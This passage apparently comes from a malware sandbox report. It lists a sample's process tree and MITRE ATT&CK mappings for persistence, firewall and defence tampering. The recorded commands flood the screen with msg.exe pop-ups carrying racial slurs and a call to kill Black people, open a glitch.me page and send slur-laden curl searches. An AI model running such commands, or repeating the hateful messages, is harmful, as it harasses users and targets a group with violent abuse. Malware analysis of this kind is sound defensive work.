      4⤵
      PID:3828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3292
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3352
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6904
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1936
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4668
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4736
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6412
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3092
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4124
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5704
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7492
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:268
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5560
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3100
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7520
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2204
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:920
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1744
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5784
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5472
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3872
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7924
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7576
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7660
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7668
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7636
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7728
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7732
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7744
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7788
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7816
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7832
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7972
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7952
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4784
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3464
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4772
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8092
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8100
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8176
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7208
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7248
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7256
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5540
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5740
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5244
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3612
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7180
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4808
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:868
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3996
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2516
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4276
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3864
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3824
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4436
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7332
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5408
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1848
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5076
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5268
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3300
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7436
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4520
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5572
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2444
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1928
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3108
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2936
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5496
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2248
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:536
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3320
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6100
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4384
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3404
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7448
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5364
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2332
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5432
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4536
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5296
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3804
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1748
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5164
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4632
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4420
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5744
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1016
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4124
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3444
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5720
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4272
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3976
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4880
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:372
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3468
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2584
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:316
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6096
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5192
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7560
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7640
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7636
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7812
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7984
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2196
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4188
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8108
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8104
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8180
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7176
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6792
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6920
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1536
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:276
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5116
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4436
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3420
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2608
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3136
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6820
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3600
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4996
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7124
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7420
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:724
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1928
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5496
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2248
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:536
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4348
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6492
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3268
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3404
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5364
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3580
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5708
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3080
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3324
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4876
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4632
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4424
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4012
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5228
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5368
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5852
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5908
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1648
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4764
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5560
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4776
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2584
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7552
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7664

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery